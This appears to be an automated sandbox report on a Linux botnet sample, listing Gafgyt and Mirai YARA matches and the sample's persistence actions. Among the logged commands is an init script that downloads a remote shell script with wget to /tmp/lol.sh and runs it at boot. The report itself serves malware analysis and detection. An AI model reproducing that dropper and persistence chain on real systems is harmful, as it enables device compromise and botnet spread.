      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: classification engineClassification label: mal92.spre.troj.evad.linELF@0/9@0/0

      Persistence and Installation Behavior

      barindex
      Sample tries to persist itself using /etc/profile
      Source: /tmp/x86_64.nn.elf (PID: 6211)File: /etc/profileJump to behavior
      Sample tries to persist itself using System V runlevels
      Source: /tmp/x86_64.nn.elf (PID: 6211)File: /etc/rc.localJump to behavior
      Source: /usr/bin/ln (PID: 6240)File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinaryJump to behavior
      Source: /usr/bin/ln (PID: 6247)File: /etc/rc.d/S99x86_64.nn.elf -> /etc/init.d/x86_64.nn.elfJump to behavior
      Sample tries to set files in /etc globally writable
      Source: /tmp/x86_64.nn.elf (PID: 6211)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 6234)File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 6243)File: /etc/init.d/x86_64.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6213)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6233)Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6239)Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6241)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_64.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_64.nn.elf'\n /tmp/x86_64.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_64.nn.elf'\n killall x86_64.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_64.nn.elf"Jump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6242)Shell command executed: sh -c "chmod +x /etc/init.d/x86_64.nn.elf >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6244)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6246)Shell command executed: sh -c "ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf >/dev/null 2>&1"Jump to behavior
      Source: /bin/sh (PID: 6234)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinaryJump to behavior
      Source: /bin/sh (PID: 6243)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/x86_64.nn.elfJump to behavior
      Source: /bin/sh (PID: 6245)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
      Source: /bin/sh (PID: 6214)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6211)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 6234)File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 6243)File: /etc/init.d/x86_64.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6211)Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinaryJump to dropped file
      Source: /tmp/x86_64.nn.elf (PID: 6211)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
      Source: /bin/sh (PID: 6241)Writes shell script file to disk with an unusual file extension: /etc/init.d/x86_64.nn.elfJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Drops files in suspicious directories
      Source: /tmp/x86_64.nn.elf (PID: 6211)File: /etc/init.d/mybinaryJump to dropped file
      Source: /bin/sh (PID: 6241)File: /etc/init.d/x86_64.nn.elfJump to dropped file
      Source: /tmp/x86_64.nn.elf (PID: 6290)Sleeps longer then 60s: 120.0sJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6292)Sleeps longer then 60s: 60.0sJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6301)Sleeps longer then 60s: 250.0sJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6311)Sleeps longer then 60s: 120.0sJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6327)Sleeps longer then 60s: 120.0sJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6352)Sleeps longer then 60s: 60.0sJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected Okiru
      Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
